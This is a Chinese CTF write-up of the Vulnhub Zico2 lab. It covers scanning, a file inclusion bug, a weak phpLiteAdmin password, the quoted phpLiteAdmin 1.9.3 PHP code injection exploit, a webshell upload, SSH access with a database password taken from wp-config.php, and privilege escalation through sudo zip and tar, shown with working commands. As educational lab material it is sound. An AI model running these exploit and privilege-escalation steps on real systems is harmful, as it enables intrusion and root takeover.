Vulnhub-Zico2靶机实战
前言
首發在個人博客👉個人博客地址
這篇文章的個人博客地址👉地址
下載地址:https://www.vulnhub.com/entry/zico2-1,210/
KALI地址:192.168.1.18
靶機地址:192.168.1.29
靶機描述如下
Description
Back to the Top
Zico’s Shop: A Boot2Root Machine intended to simulate a real world cenario
Disclaimer:
By using this virtual machine, you agree that in no event will I be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of or in connection with the use of this software.
TL;DR - You are about to load up a virtual machine with vulnerabilities. If something bad happens, it’s not my fault.
Level: Intermediate
Goal: Get root and read the flag file
Description:
Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea?
Hint: Enumerate, enumerate, and enumerate!
Thanks to: VulnHub
Author: Rafael (@rafasantos5)
Doesn’t work with VMware. Virtualbox only.
一.信息收集
1.主機發現
使用命令如下
netdiscover -r 192.168.1.18發現了靶機地址,紅色箭頭所示
2.主機掃描
使用命令如下,先進行簡單的掃描
nmap -sV 192.168.1.29發現有了一些基本信息,但是感覺還是不夠詳細,這里看出的信息是開放了80,22,111端口
詳細一點的掃描,使用命令如下
nmap -A -T4 -O -p 0-65535 192.168.1.29發現大致相同,多了一個41312的端口
3.目錄掃描
前面nmap掃描發現了開放了80端口那么直接對靶機進行目錄掃描,使用命令如下
dirb http://192.168.1.29如下圖,看名字就感覺紅色箭頭奇怪。
二.漏洞利用
1.文件包含
在上述信息過程中還包括了,網頁漏洞挖掘,和網頁源代碼查詢,最終在網頁首先的下面發現了CHECK THEM OUT!的字樣,如下圖紅色箭頭,很難不想象是文件包含。
經過測試,包含了/etc/passwd文件,發現確實有這個漏洞,并且發現了zico用戶,如下圖。
2.CMS漏洞
經過上面信息收集目錄掃描,發現了一個dbadmin的目錄,然后里面有一個php文件,打開叫我們輸入密碼,如下圖,經過弱密碼測試,密碼密碼是admin。
進去之后也不知道干嘛,只能看看這個有啥漏洞了,在kali使用命令如下。
searchsploit phpliteadmin發現查找到了東西,如下圖,發現有遠程代碼執行漏洞。
既然發現了有遠程代碼執行漏洞,那就直接看文檔怎么利用了,使用命令把文檔拷貝到桌面上查看,命令如下。
cp /usr/share/exploitdb/exploits/php/webapps/24044.txt /root/Desktop如下圖,照著利用就好了,但是。。。emmmm,看不懂咋辦。
下面是谷歌翻譯的結果,然后我直接把翻譯結果放下面了。
# 漏洞利用標題:phpliteadmin <= 1.9.3 遠程 PHP 代碼注入漏洞 # Google Dork: inurl:phpliteadmin.php (默認密碼: admin) # 日期:2013 年 1 月 10 日 # 漏洞利用作者:L@usch - http://la.usch.io - http://la.usch.io/files/exploits/phpliteadmin-1.9.3.txt # 供應??商主頁:http://code.google.com/p/phpliteadmin/ # 供應??商狀態:通知 # 軟件鏈接:http://phpliteadmin.googlecode.com/files/phpliteadmin_v1-9-3.zip # 版本:1.9.3 # 測試環境:Windows 和 Linux描述:phpliteadmin.php#1784: '創建一個新數據庫' => phpliteadmin.php#1785: '當你創建一個新數據庫時,如果你自己沒有包含它,你輸入的名稱將附加適當的文件擴展名(.db、.db3、.sqlite 等)。數據庫將在您指定為 $directory 變量的目錄中創建。',攻擊者可以創建一個帶有 php 擴展名的 sqlite 數據庫,并將 PHP 代碼作為文本字段插入。完成后,攻擊者只需使用 Web 瀏覽器訪問數據庫文件即可執行它。概念證明:1.我們創建一個名為“hack.php”的數據庫。 (取決于服務器配置,有時它不起作用,數據庫的名稱將是“hack.sqlite”。然后只需嘗試將數據庫/現有數據庫重命名為“hack.php”。) 該腳本會將 sqlite 數據庫存儲在與 phpliteadmin.php 相同的目錄中。 預覽:http://goo.gl/B5n9O 十六進制預覽:http://goo.gl/lJ5iQ2. 現在在這個數據庫中創建一個新表并插入一個具有默認值的文本字段: <?php phpinfo()?> 十六進制預覽:http://goo.gl/v7USQ3. 現在我們運行 hack.php完畢!證明:http://goo.gl/ZqPVLOK,這下大概曉得了,先創建一個.php的數據庫,然后在表里面寫入php代碼內容即可,跟著下面圖片操作即可。
上面的操作,創建一個叫做hack.php的數據庫然后創建了一個hack表,現在我們需要往里面寫東西,如下圖,這里寫入的是phpinfo來驗證是否可以顯現出來。
[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-siE81Akq-1648090130614)(/images/wordimage/2022/0323/phpinfo.png)]
因為上面創建數據庫都顯示了路徑了,思路是用上面發現的文件包含漏洞,來包含我們創建的數據庫php,如下圖操作包含成功,能顯示出來。
既然可以這樣了,那么思路來了,我們是否可以寫入一句話木馬,或者反彈shell。
3.寫入一句話木馬
如下圖,寫入了一句話木馬。
然后通過蟻劍連接,如下圖結果,是可以的。
三.提權
我們現在地權限進入了系統,剩下的就需要提權了,老樣子先查看,home目錄下面有什么東西,如下圖,發現了wordpress。
然后查看了一下wordpress的數據庫配置文件/wp-config.php,如下圖,然后發現用戶是zico,因為上面查看passwd下面的文件的時候,發現有zico用戶很難不會把這兩個東西聯想在一起。
用戶:zico
密碼:sWfCsfJSPV9H3AmQzw8
可以嘗試一下ssh連接,如下圖可以成功連接進去!
然后這里嘗試切換到root用戶,發現不可行,如下圖。
切換思路,查看現在這個用戶有sudo啥權限,使用命令如下
sudo -l發現可以使用zip和tar命令是root權限執行,如下圖,意思是可以使用zip和tar提權。
1.zip提權
大概就是把一個文件zip打包的時候執行命令,可以看這個文章👉ZIP提權,如下操作步驟
zico@zico:~$ touch 1 zico@zico:~$ sudo zip 1.zip 1 -T --unzip-command="sh -c /bin/bash"adding: 1 (stored 0%) root@zico:~# id uid=0(root) gid=0(root) groups=0(root) root@zico:~# whoami root如下圖操作結果,成功提權到了root用戶。
2.tar提權
意思和上面zip差不多一樣需要代碼參數--checkpoint和--checkpoint-action來執行命令,但是并沒有打包因為使用了/dev/null。
zico@zico:~$ touch 1 zico@zico:~$ zico@zico:~$ sudo tar cf /dev/null 1 --checkpoint=1 --checkpoint-action=exec=/bin/bash root@zico:~# id uid=0(root) gid=0(root) groups=0(root) root@zico:~#如下圖結果,成功切換到root權限。
然后查看flag就可以完事了,如下圖flag。
四.總結
對于我來說的話需要注意的是提權操作,這個算是新玩意了。
總結
以上是生活随笔為你收集整理的Vulnhub-Zico2靶机实战的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: java的结课课程设计,java课程设计
- 下一篇: 版式设计小结